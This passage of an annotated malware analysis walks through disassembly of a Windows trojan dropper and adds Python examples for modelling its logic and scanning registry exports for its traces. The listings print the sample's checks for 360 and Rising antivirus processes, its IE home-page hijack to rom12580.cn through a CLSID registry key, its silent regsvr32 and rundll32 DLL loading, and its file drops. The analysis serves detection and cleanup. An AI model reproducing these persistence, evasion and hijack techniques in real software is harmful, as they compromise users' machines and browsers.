0040409A|.5E POP ESI
0040409B|.64:890D 00000>MOV DWORD PTR FS:,ECX
004040A2|.C9 LEAVE
004040A3\.C3 RETN
8. Enumerate processes looking for "360tray.exe" or "360TRAY.EXE" (two case-sensitive strstr calls, with no lowercasing). When it is found the routine only logs "Find 360 Process" through OutputDebugStringA and returns 1; section 2 shows the caller then skipping the home-page lock rather than killing the process.
00404389/$55 PUSH EBP
0040438A|.8BEC MOV EBP,ESP
0040438C|.81EC 30020000 SUB ESP,230
00404392|.53 PUSH EBX
00404393|.33DB XOR EBX,EBX
00404395|.53 PUSH EBX ; /ProcessID = 0
00404396|.6A 02 PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
00404398|.E8 5BD4FFFF CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot
0040439D|.8D8D D4FEFFFF LEA ECX,DWORD PTR SS:
004043A3|.8945 FC MOV DWORD PTR SS:,EAX
004043A6|.51 PUSH ECX ; /pProcessentry
004043A7|.50 PUSH EAX ; |hSnapshot
004043A8|.C785 D4FEFFFF>MOV DWORD PTR SS:,128 ; |
004043B2|.E8 3BD4FFFF CALL <JMP.&KERNEL32.Process32First> ; \Process32First
004043B7|.85C0 TEST EAX,EAX
004043B9|.74 70 JE SHORT 复件_123.0040442B
004043BB|.56 PUSH ESI
004043BC|.8B35 50504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.OutputD>;kernel32.OutputDebugStringA
004043C2|.57 PUSH EDI
004043C3|.BF F0E34300 MOV EDI,复件_123.0043E3F0 ;ASCII "Find 360 Process"
004043C8|>8D85 F8FEFFFF /LEA EAX,DWORD PTR SS:
004043CE|.68 E4E34300 |PUSH 复件_123.0043E3E4 ; /s2 = "360tray.exe"
004043D3|.50 |PUSH EAX ; |s1
004043D4|.FF15 88514000 |CALL DWORD PTR DS:[<&MSVCRT.strstr>] ; \strstr
004043DA|.59 |POP ECX
004043DB|.85C0 |TEST EAX,EAX
004043DD|.59 |POP ECX
004043DE|.75 18 |JNZ SHORT 复件_123.004043F8
004043E0|.8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:
004043E6|.68 D8E34300 |PUSH 复件_123.0043E3D8 ; /s2 = "360TRAY.EXE"
004043EB|.50 |PUSH EAX ; |s1
004043EC|.FF15 88514000 |CALL DWORD PTR DS:[<&MSVCRT.strstr>] ; \strstr
004043F2|.59 |POP ECX
004043F3|.85C0 |TEST EAX,EAX
004043F5|.59 |POP ECX
004043F6|.74 1E |JE SHORT 复件_123.00404416
004043F8|>8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:
004043FE|.50 |PUSH EAX ; /src
004043FF|.8D85 D0FDFFFF |LEA EAX,DWORD PTR SS: ; |
00404405|.50 |PUSH EAX ; |dest
00404406|.E8 C7D1FFFF |CALL <JMP.&MSVCRT.strcpy> ; \strcpy
0040440B|.8B9D DCFEFFFF |MOV EBX,DWORD PTR SS:
00404411|.59 |POP ECX
00404412|.59 |POP ECX
00404413|.57 |PUSH EDI
00404414|.FFD6 |CALL ESI
00404416|>8D85 D4FEFFFF |LEA EAX,DWORD PTR SS:
0040441C|.50 |PUSH EAX ; /pProcessentry
0040441D|.FF75 FC |PUSH DWORD PTR SS: ; |hSnapshot
00404420|.E8 C7D3FFFF |CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
00404425|.85C0 |TEST EAX,EAX
00404427|.^ 75 9F \JNZ SHORT 复件_123.004043C8
00404429|.5F POP EDI
0040442A|.5E POP ESI
0040442B|>FF75 FC PUSH DWORD PTR SS: ; /hObject
0040442E|.FF15 60504000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
00404434|.33C0 XOR EAX,EAX
00404436|.3BC3 CMP EAX,EBX
00404438|.5B POP EBX
00404439|.1BC0 SBB EAX,EAX
0040443B|.F7D8 NEG EAX
0040443D|.C9 LEAVE
0040443E\.C3 RETN
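The AV-check gate restated as code (an added example, not part of the original post and not the sample's code): it mirrors the matching done by the two routines above and the branch the main routine in section 2 takes, so you can check which actions a given process list produces. The process lists are constructed; the action labels are the ones the post's comments give to the called functions.

```python
"""Model of the AV-presence gate in the main routine (section 2).

Restates the decisions visible in the listings:
  * 00404000 lowercases each exe name (CString::MakeLower) and does a
    substring search (CString::Find) for "ravmond.exe".
  * 00404389 calls strstr twice with the fixed spellings "360tray.exe" and
    "360TRAY.EXE" and never lowercases, so other casings are not matched.
  * In the caller: ravmond found -> 004042B3/00404311 and skip the rest;
    otherwise 360tray found -> skip the home-page lock; otherwise lock it.
"""


def ravmond_running(process_names):
    """Mirror of 00404000: case-insensitive substring match."""
    return any("ravmond.exe" in name.lower() for name in process_names)


def tray360_running(process_names):
    """Mirror of 00404389: two case-sensitive strstr calls, nothing else."""
    return any("360tray.exe" in name or "360TRAY.EXE" in name
               for name in process_names)


def main_routine_actions(process_names):
    """Sequence of actions the routine at 0040443F takes, using the labels
    the post's comments give to the called functions."""
    actions = ["create_registry_keys"]
    if ravmond_running(process_names):
        actions += ["call_004042B3", "call_00404311"]
    elif not tray360_running(process_names):
        actions.append("lock_ie_homepage")
    actions += ["drop_zrrs1.dll", "create_D_ssshall", "drop_iksii.dll",
                "inject_rundll", "drop_virus_body"]
    return actions


# Constructed process lists, as Process32First/Next would report szExeFile.
CLEAN_HOST = ["System", "smss.exe", "explorer.exe", "IEXPLORE.EXE"]
RISING_HOST = CLEAN_HOST + ["RavMonD.exe"]
QIHOO_HOST = CLEAN_HOST + ["360tray.exe"]
QIHOO_MIXED_CASE = CLEAN_HOST + ["360Tray.exe"]  # slips past the strstr pair

if __name__ == "__main__":
    for label, procs in (("clean", CLEAN_HOST), ("rising", RISING_HOST),
                         ("360", QIHOO_HOST), ("360 mixed case", QIHOO_MIXED_CASE)):
        print(label, "->", main_routine_actions(procs))
```

The mixed-case list shows the asymmetry between the two checks: the Rising check is case-insensitive, the 360 check only matches the two literal spellings it carries.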
9. Lock the IE home page to http://www.rom12580.cn. The routine does not look for a running IEXPLORE.EXE; it builds the command line "<drive>:\Program Files\Internet Explorer\IEXPLORE.EXE" http://www.rom12580.cn (the drive letter is the first character returned by GetWindowsDirectoryA) and writes it as the default value of
HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
{871C5380-42A0-1069-A2EA-08002B30309D} is the Internet Explorer desktop icon, so opening the home page from that icon launches IE with the attacker's URL as its argument.
004041DA/$B8 20194000 MOV EAX,123.00401920
004041DF|.E8 0CD4FFFF CALL 123.004015F0
004041E4|.81EC 14020000 SUB ESP,214
004041EA|.56 PUSH ESI
004041EB|.8D4D E8 LEA ECX,DWORD PTR SS:
004041EE|.E8 0ACFFFFF CALL 123.004010FD
004041F3|.8365 FC 00 AND DWORD PTR SS:,0
004041F7|.BE 04010000 MOV ESI,104
004041FC|.8D85 E0FDFFFF LEA EAX,DWORD PTR SS:
00404202|.56 PUSH ESI ; /BufSize = 104 (260.)
00404203|.50 PUSH EAX ; |Buffer
00404204|.FF15 4C504000 CALL DWORD PTR DS:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA //get the Windows directory; only its drive letter is used below
0040420A|.56 PUSH ESI ; /n => 104 (260.)
0040420B|.8D85 E4FEFFFF LEA EAX,DWORD PTR SS: ; |
00404211|.6A 00 PUSH 0 ; |c = 00
00404213|.50 PUSH EAX ; |s
00404214|.E8 3BD4FFFF CALL <JMP.&MSVCRT.memset> ; \memset
00404219|.8A85 E0FDFFFF MOV AL,BYTE PTR SS:
0040421F|.68 48E34300 PUSH 123.0043E348 ; /src = ":\Program Files\Internet Explorer\IEXPLORE.EXE"
00404224|.8885 E5FEFFFF MOV BYTE PTR SS:,AL ; |
0040422A|.8D85 E4FEFFFF LEA EAX,DWORD PTR SS: ; |
00404230|.50 PUSH EAX ; |dest
00404231|.C685 E4FEFFFF>MOV BYTE PTR SS:,22 ; |
00404238|.E8 9BD3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
0040423D|.8D85 E4FEFFFF LEA EAX,DWORD PTR SS:
00404243|.68 44E34300 PUSH 123.0043E344 ; /src = """
00404248|.50 PUSH EAX ; |dest
00404249|.E8 8AD3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
0040424E|.8D85 E4FEFFFF LEA EAX,DWORD PTR SS:
00404254|.68 40E34300 PUSH 123.0043E340 ; /src = " "
00404259|.50 PUSH EAX ; |dest
0040425A|.E8 79D3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
0040425F|.8D85 E4FEFFFF LEA EAX,DWORD PTR SS:
00404265|.68 28E34300 PUSH 123.0043E328 ; /src = "http://www.rom12580.cn"
0040426A|.50 PUSH EAX ; |dest
0040426B|.E8 68D3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
00404270|.83C4 2C ADD ESP,2C
00404273|.8D4D E8 LEA ECX,DWORD PTR SS:
00404276|.68 E0E24300 PUSH 123.0043E2E0 ;ASCII "CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command"
0040427B|.68 00000080 PUSH 80000000
00404280|.E8 E6CEFFFF CALL 123.0040116B //open the key (RegOpenKeyExA wrapper, section 10)
00404285|.85C0 TEST EAX,EAX
00404287|.5E POP ESI
00404288|.75 11 JNZ SHORT 123.0040429B
0040428A|.8D85 E4FEFFFF LEA EAX,DWORD PTR SS:
00404290|.8D4D E8 LEA ECX,DWORD PTR SS:
00404293|.50 PUSH EAX
00404294|.6A 00 PUSH 0
00404296|.E8 A8DDFFFF CALL 123.00402043 //write the IEXPLORE.EXE + http://www.rom12580.cn command as the key's default value (section 11)
0040429B|>834D FC FF OR DWORD PTR SS:,FFFFFFFF
0040429F|.8D4D E8 LEA ECX,DWORD PTR SS:
004042A2|.E8 8BCEFFFF CALL 123.00401132 //close the key
004042A7|.8B4D F4 MOV ECX,DWORD PTR SS:
004042AA|.64:890D 00000>MOV DWORD PTR FS:,ECX
004042B1|.C9 LEAVE
004042B2\.C3 RETN
10. The RegOpenKeyExA wrapper used by the home-page lock (opens the subkey with KEY_ALL_ACCESS)
0040116B /$ 56 PUSH ESI
0040116C |. 8BF1 MOV ESI,ECX
0040116E |. FF7424 0C PUSH DWORD PTR SS:
00401172 |. 8D4E 08 LEA ECX,DWORD PTR DS:
00401175 |. E8 38030000 CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
0040117A |. 83C6 04 ADD ESI,4
0040117D |. 56 PUSH ESI ; /pHandle
0040117E |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
00401183 |. 6A 00 PUSH 0 ; |Reserved = 0
00401185 |. FF7424 18 PUSH DWORD PTR SS: ; |Subkey
00401189 |. FF7424 18 PUSH DWORD PTR SS: ; |hKey
0040118D |. FF15 0C504000 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00401193 |. 5E POP ESI
00401194 \. C2 0800 RETN 8
11. The RegSetValueExA wrapper that writes the IEXPLORE.EXE + http://www.rom12580.cn command (type 2 = REG_EXPAND_SZ; the data length is strlen+1 so the terminator is included)
00402043 /$ 56 PUSH ESI
00402044 |. 8BF1 MOV ESI,ECX
00402046 |. FF7424 0C PUSH DWORD PTR SS: ; /s
0040204A |. E8 C1F5FFFF CALL <JMP.&MSVCRT.strlen> ; \strlen
0040204F |. 59 POP ECX ; 0012FDC4
00402050 |. 40 INC EAX
00402051 |. 50 PUSH EAX ; /BufSize
00402052 |. FF7424 10 PUSH DWORD PTR SS: ; |Buffer
00402056 |. 6A 02 PUSH 2 ; |ValueType = REG_EXPAND_SZ
00402058 |. 6A 00 PUSH 0 ; |Reserved = 0
0040205A |. FF7424 18 PUSH DWORD PTR SS: ; |ValueName
0040205E |. FF76 04 PUSH DWORD PTR DS: ; |hKey
00402061 |. FF15 00504000 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA
00402067 |. 5E POP ESI
00402068 \. C2 0800 RETN 8
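An added example, not from the original post: a scanner for the registry artifacts of sections 3 to 5 and 9 to 11 that works offline on a reg export dump. It handles the .reg text format reg.exe writes (hex(2): for REG_EXPAND_SZ, long values wrapped across lines with a trailing backslash), flags any HKLM\SOFTWARE\Softfy key, extracts the dllname/dllpath values the CSID key records (the name of the DLL dropped in section 14 and the D:\ssshall path), and reports a URL appended to the IE desktop-icon OpenHomePage command. The sample export embedded in it is constructed from the strings in the listings; whether PlugStat and CoreDll are REG_DWORD is an assumption.

```python
"""Scan a `reg export` dump for the registry artifacts this dropper leaves.

Understands the .reg text format written by reg.exe: [key] headers,
"name"=data lines, @ for the default value, dword:, hex: and hex(2):
(REG_EXPAND_SZ as UTF-16LE bytes), and hex data wrapped with `,\\`.
"""
import re

IE_ICON_CLSID = "{871C5380-42A0-1069-A2EA-08002B30309D}"
HOMEPAGE_CMD_KEY = (r"HKEY_CLASSES_ROOT\CLSID\%s\shell\OpenHomePage\Command"
                    % IE_ICON_CLSID)
SOFTFY_PREFIX = r"HKEY_LOCAL_MACHINE\SOFTWARE\Softfy"
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def _join_continuations(text):
    """reg.exe wraps long hex data as `xx,xx,\\` + newline + two spaces; undo that."""
    out, pending = [], None
    for raw in text.splitlines():
        line = raw.strip() if pending is not None else raw.rstrip()
        if pending is not None:
            line, pending = pending + line, None
        if line.endswith("\\"):
            pending = line[:-1]
        else:
            out.append(line)
    if pending is not None:
        out.append(pending)
    return out


def _decode_value(data):
    """Decode one value's data field: quoted string, dword:, or hex[(type)]:."""
    if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
        return re.sub(r"\\(.)", r"\1", data[1:-1])  # .reg escapes \ and " with \
    if data.startswith("dword:"):
        return int(data[6:], 16)
    m = re.match(r"hex(?:\((\d+)\))?:(.*)$", data)
    if m:
        reg_type = int(m.group(1) or 3)  # bare hex: is REG_BINARY (3)
        raw = bytes(int(b, 16) for b in m.group(2).split(",") if b)
        if reg_type in (2, 7):  # REG_EXPAND_SZ / REG_MULTI_SZ are UTF-16LE
            return raw.decode("utf-16-le").rstrip("\0")
        return raw
    return data


def parse_reg_export(text):
    """Return {key_path: {value_name: data}}; the default value is named "@"."""
    keys, current = {}, None
    for line in _join_continuations(text.lstrip("\ufeff")):
        if not line or line[0] == ";" or line.startswith("Windows Registry Editor"):
            continue
        if line[0] == "[" and line[-1] == "]":
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name = "@" if m.group(1) == "@" else m.group(1)[1:-1]
            keys[current][name] = _decode_value(m.group(2))
    return keys


def find_indicators(keys):
    """Return (indicator, key, detail) tuples for the artifacts in the listings."""
    findings = []
    for key, values in keys.items():
        upper = key.upper()
        if upper.startswith(SOFTFY_PREFIX.upper()):
            findings.append(("softfy_key", key, sorted(values)))
            if upper.endswith("\\CSID"):
                # Section 5 writes the dropped DLL name and D:\ssshall into CSID.
                for name in ("dllname", "dllpath"):
                    if name in values:
                        findings.append(("file_ioc", key, "%s=%s" % (name, values[name])))
        if upper == HOMEPAGE_CMD_KEY.upper():
            cmd = values.get("@", "")
            url = URL_RE.search(cmd) if isinstance(cmd, str) else None
            if url:
                findings.append(("homepage_hijack", key, url.group(0)))
    return findings


def scan(text):
    return find_indicators(parse_reg_export(text))


def _hex2(s):
    """Encode s as reg.exe exports REG_EXPAND_SZ: UTF-16LE, NUL-terminated,
    comma-separated hex bytes wrapped with a trailing backslash."""
    hexbytes = ["%02x" % b for b in (s + "\0").encode("utf-16-le")]
    rows = [",".join(hexbytes[i:i + 20]) for i in range(0, len(hexbytes), 20)]
    return "hex(2):" + ",\\\n  ".join(rows)


HIJACKED_CMD = '"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE" http://www.rom12580.cn'

# Constructed sample export, modelled on the key and value names in the listings.
# Assumption: PlugStat and CoreDll are REG_DWORD (they are set through 00402000,
# a different wrapper from the one used for the string values).
SAMPLE_EXPORT = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\Softfy\Plug]",
    '"PlugUserName"="full80"',
    '"PlugSoftName"="C2"',
    '"PlugSoftVer"="1.0.1"',
    '"PlugStat"=dword:00000000',
    '"CoreDll"=dword:00000001',
    "",
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\Softfy\CSID]",
    '"csid"="{C4560D12-CE25-4A2E-A5D4-B5070FCBE282}"',
    '"dllname"="iksii.dll"',
    r'"dllpath"="D:\\ssshall"',
    "",
    "[" + HOMEPAGE_CMD_KEY + "]",
    "@=" + _hex2(HIJACKED_CMD),
    "",
])

if __name__ == "__main__":
    for kind, key, detail in scan(SAMPLE_EXPORT):
        print(kind, key, detail)
```

On a suspect machine, export the two locations with reg export HKLM\SOFTWARE\Softfy softfy.reg and reg export "HKCR\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}" ie.reg, read the files with encoding="utf-16" (reg.exe writes UTF-16LE with a BOM) and pass the text to scan(). A clean OpenHomePage command carries no argument after the executable, so any URL after it is a hijack.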
12. Drop the file to C:\windows\system32\zrrs1.dll and C:\windows\system32\dllcache\zrrs1.dll. The file name comes from the global string at 0043E5E8; for each path the write (00403053) is skipped when 004012A3 returns non-zero, which looks like an existence check. The dllcache copy is a second location to clean.
004030CA /$ 55 PUSH EBP
004030CB |. 8BEC MOV EBP,ESP
004030CD |. 81EC 04010000 SUB ESP,104
004030D3 |. 53 PUSH EBX
004030D4 |. 56 PUSH ESI
004030D5 |. 8B35 4C504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.GetWind>; kernel32.GetWindowsDirectoryA //get the Windows directory
004030DB |. 57 PUSH EDI
004030DC |. BF 04010000 MOV EDI,104
004030E1 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004030E7 |. 57 PUSH EDI ; /BufSize => 104 (260.)
004030E8 |. 50 PUSH EAX ; |Buffer
004030E9 |. FFD6 CALL ESI ; \GetWindowsDirectoryA
004030EB |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004030F1 |. 68 90E04300 PUSH 复件_123.0043E090 ; /src = "\System32\"
004030F6 |. 50 PUSH EAX ; |dest
004030F7 |. E8 DCE4FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
004030FC |. FF35 E8E54300 PUSH DWORD PTR DS: ; /src = "zrrs1.dll"
00403102 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS: ; |
00403108 |. 50 PUSH EAX ; |dest
00403109 |. E8 CAE4FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
0040310E |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
00403114 |. 50 PUSH EAX
00403115 |. E8 89E1FFFF CALL 复件_123.004012A3
0040311A |. 8B1D 50504000 MOV EBX,DWORD PTR DS:[<&KERNEL32.OutputD>; kernel32.OutputDebugStringA
00403120 |. 83C4 14 ADD ESP,14
00403123 |. 85C0 TEST EAX,EAX
00403125 |. 75 16 JNZ SHORT 复件_123.0040313D
00403127 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
0040312D |. 50 PUSH EAX ; /String
0040312E |. FFD3 CALL EBX ; \OutputDebugStringA
00403130 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
00403136 |. 50 PUSH EAX
00403137 |. E8 17FFFFFF CALL 复件_123.00403053
0040313C |. 59 POP ECX
0040313D |> 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
00403143 |. 57 PUSH EDI
00403144 |. 50 PUSH EAX
00403145 |. FFD6 CALL ESI
00403147 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
0040314D |. 68 7CE04300 PUSH 复件_123.0043E07C ; /src = "\System32\dllcache\"
00403152 |. 50 PUSH EAX ; |dest
00403153 |. E8 80E4FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
00403158 |. FF35 E8E54300 PUSH DWORD PTR DS: ; /src = "zrrs1.dll"
0040315E |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS: ; |
00403164 |. 50 PUSH EAX ; |dest
00403165 |. E8 6EE4FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
0040316A |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
00403170 |. 50 PUSH EAX
00403171 |. E8 2DE1FFFF CALL 复件_123.004012A3
00403176 |. 83C4 14 ADD ESP,14
00403179 |. 85C0 TEST EAX,EAX
0040317B |. 75 16 JNZ SHORT 复件_123.00403193
0040317D |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
00403183 |. 50 PUSH EAX
00403184 |. FFD3 CALL EBX
00403186 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
0040318C |. 50 PUSH EAX
0040318D |. E8 C1FEFFFF CALL 复件_123.00403053
00403192 |. 59 POP ECX
00403193 |> 5F POP EDI
00403194 |. 5E POP ESI
00403195 |. 5B POP EBX
00403196 |. C9 LEAVE
00403197 \. C3 RETN
13. Creating the D:\ssshall folder
00403211 /$ B8 B4184000 MOV EAX,复件_123.004018B4
00403216 |. E8 D5E3FFFF CALL 复件_123.004015F0
0040321B |. 51 PUSH ECX
0040321C |. 51 PUSH ECX
0040321D |. 56 PUSH ESI
0040321E |. 8D4D F0 LEA ECX,DWORD PTR SS:
00403221 |. E8 7AE2FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
00403226 |. 33F6 XOR ESI,ESI
00403228 |. 68 9CE04300 PUSH 复件_123.0043E09C ; ASCII "D:\ssshall"
0040322D |. 8D4D F0 LEA ECX,DWORD PTR SS:
00403230 |. 8975 FC MOV DWORD PTR SS:,ESI
00403233 |. E8 7AE2FFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
00403238 |. 51 PUSH ECX
00403239 |. 8D45 F0 LEA EAX,DWORD PTR SS:
0040323C |. 8BCC MOV ECX,ESP
0040323E |. 8965 EC MOV DWORD PTR SS:,ESP
00403241 |. 50 PUSH EAX
00403242 |. E8 5BE3FFFF CALL <JMP.&MFC42.#535_??0CString@@QAE@AB>
00403247 |. E8 4CFFFFFF CALL 复件_123.00403198
0040324C |. 3BC6 CMP EAX,ESI
0040324E |. 59 POP ECX
0040324F |. 75 19 JNZ SHORT 复件_123.0040326A
00403251 |. 51 PUSH ECX
00403252 |. 8D45 F0 LEA EAX,DWORD PTR SS:
00403255 |. 8BCC MOV ECX,ESP
00403257 |. 8965 EC MOV DWORD PTR SS:,ESP
0040325A |. 50 PUSH EAX
0040325B |. E8 42E3FFFF CALL <JMP.&MFC42.#535_??0CString@@QAE@AB>
00403260 |. E8 74FFFFFF CALL 复件_123.004031D9
00403265 |. 3BC6 CMP EAX,ESI
00403267 |. 59 POP ECX
00403268 |. 74 1C JE SHORT 复件_123.00403286
0040326A |> 51 PUSH ECX
0040326B |. 8D45 F0 LEA EAX,DWORD PTR SS:
0040326E |. 8BCC MOV ECX,ESP
00403270 |. 8965 EC MOV DWORD PTR SS:,ESP
00403273 |. 50 PUSH EAX
00403274 |. E8 29E3FFFF CALL <JMP.&MFC42.#535_??0CString@@QAE@AB>
00403279 |. E8 77FFFFFF CALL 复件_123.004031F5
0040327E |. 3BC6 CMP EAX,ESI
00403280 |. 59 POP ECX
00403281 |. 74 03 JE SHORT 复件_123.00403286
00403283 |. 6A 01 PUSH 1
00403285 |. 5E POP ESI
00403286 |> 834D FC FF OR DWORD PTR SS:,FFFFFFFF
0040328A |. 8D4D F0 LEA ECX,DWORD PTR SS:
0040328D |. E8 1AE2FFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00403292 |. 8B4D F4 MOV ECX,DWORD PTR SS:
00403295 |. 8BC6 MOV EAX,ESI
00403297 |. 64:890D 00000>MOV DWORD PTR FS:,ECX
0040329E |. 5E POP ESI
0040329F |. C9 LEAVE
004032A0 \. C3 RETN
14. Drops the file C:\windows\System32\iksii.dll and registers it with "regsvr32 /s"; surprisingly, this dropped file is itself detected
Detection name: Trojan-Downloader.Win32.Adload.vk (Micropoint definition)
004033B1 /$ 55 PUSH EBP
004033B2 |. 8BEC MOV EBP,ESP
004033B4 |. 81EC 08020000 SUB ESP,208
004033BA |. 56 PUSH ESI
004033BB |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004033C1 |. 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
004033C6 |. 50 PUSH EAX ; |Buffer
004033C7 |. FF15 4C504000 CALL DWORD PTR DS:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
004033CD |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004033D3 |. 68 90E04300 PUSH 复件_123.0043E090 ; /src = "\System32\"
004033D8 |. 50 PUSH EAX ; |dest
004033D9 |. E8 FAE1FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
004033DE |. FF35 E4E54300 PUSH DWORD PTR DS: ; /src = "iksii.dll"
004033E4 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS: ; |
004033EA |. 50 PUSH EAX ; |dest = "C:\windows\System32\"
004033EB |. E8 E8E1FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
004033F0 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004033F6 |. 50 PUSH EAX
004033F7 |. E8 A7DEFFFF CALL 复件_123.004012A3
004033FC |. 8B35 50504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.OutputD>; kernel32.OutputDebugStringA
00403402 |. 83C4 14 ADD ESP,14
00403405 |. 85C0 TEST EAX,EAX
00403407 |. 75 16 JNZ SHORT 复件_123.0040341F
00403409 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
0040340F |. 50 PUSH EAX ; /String
00403410 |. FFD6 CALL ESI ; \OutputDebugStringA
00403412 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
00403418 |. 50 PUSH EAX
00403419 |. E8 E1FEFFFF CALL 复件_123.004032FF
0040341E |. 59 POP ECX
0040341F |> 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:
00403425 |. 68 C4E04300 PUSH 复件_123.0043E0C4 ; /src = "regsvr32 /s "
0040342A |. 50 PUSH EAX ; |dest
0040342B |. E8 A2E1FFFF CALL <JMP.&MSVCRT.strcpy> ; \strcpy
00403430 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
00403436 |. 50 PUSH EAX ; /src
00403437 |. 8D85 F8FDFFFF LEA EAX,DWORD PTR SS: ; |
0040343D |. 50 PUSH EAX ; |dest
0040343E |. E8 95E1FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
00403443 |. 83C4 10 ADD ESP,10
00403446 |. 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:
0040344C |. 50 PUSH EAX
0040344D |. FFD6 CALL ESI
0040344F |. 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:
00403455 |. 50 PUSH EAX
00403456 |. E8 1BFFFFFF CALL 复件_123.00403376
0040345B |. 59 POP ECX
0040345C |. 5E POP ESI
0040345D |. C9 LEAVE
0040345E \. C3 RETN
15. Injects into a rundll32.exe process and runs, making outbound connection requests to the Internet
004032A1 /$ 55 PUSH EBP
004032A2 |. 8BEC MOV EBP,ESP
004032A4 |. 81EC 04010000 SUB ESP,104
004032AA |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004032B0 |. 68 B8E04300 PUSH 复件_123.0043E0B8 ; /src = "rundll32 "
004032B5 |. 50 PUSH EAX ; |dest
004032B6 |. E8 17E3FFFF CALL <JMP.&MSVCRT.strcpy> ; \strcpy
004032BB |. FF35 E8E54300 PUSH DWORD PTR DS: ; /src = "zrrs1.dll"
004032C1 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS: ; |
004032C7 |. 50 PUSH EAX ; |dest
004032C8 |. E8 0BE3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
004032CD |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004032D3 |. 68 A8E04300 PUSH 复件_123.0043E0A8 ; /src = " , InstallMyDll"
004032D8 |. 50 PUSH EAX ; |dest
004032D9 |. E8 FAE2FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
004032DE |. 83C4 18 ADD ESP,18
004032E1 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004032E7 |. 50 PUSH EAX ; /String
004032E8 |. FF15 50504000 CALL DWORD PTR DS:[<&KERNEL32.OutputDebu>; \OutputDebugStringA
004032EE |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004032F4 |. 6A 05 PUSH 5 ; /ShowState = SW_SHOW
004032F6 |. 50 PUSH EAX ; |CmdLine
004032F7 |. FF15 58504000 CALL DWORD PTR DS:[<&KERNEL32.WinExec>] ; \WinExec // at this point an extra rundll32.exe process appears
004032FD |. C9 LEAVE
004032FE \. C3 RETN
16. Drops the parent virus body to C:\Windows\system32\xxggyu.exe
00401077 /$ 55 PUSH EBP
00401078 |. 8BEC MOV EBP,ESP
0040107A |. 81EC 04010000 SUB ESP,104
00401080 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
00401086 |. 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
0040108B |. 50 PUSH EAX ; |Buffer
0040108C |. FF15 4C504000 CALL DWORD PTR DS:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
00401092 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
00401098 |. 68 30004100 PUSH 复件_123.00410030 ; /src = "\system32\"
0040109D |. 50 PUSH EAX ; |dest
0040109E |. E8 35050000 CALL <JMP.&MSVCRT.strcat> ; \strcat
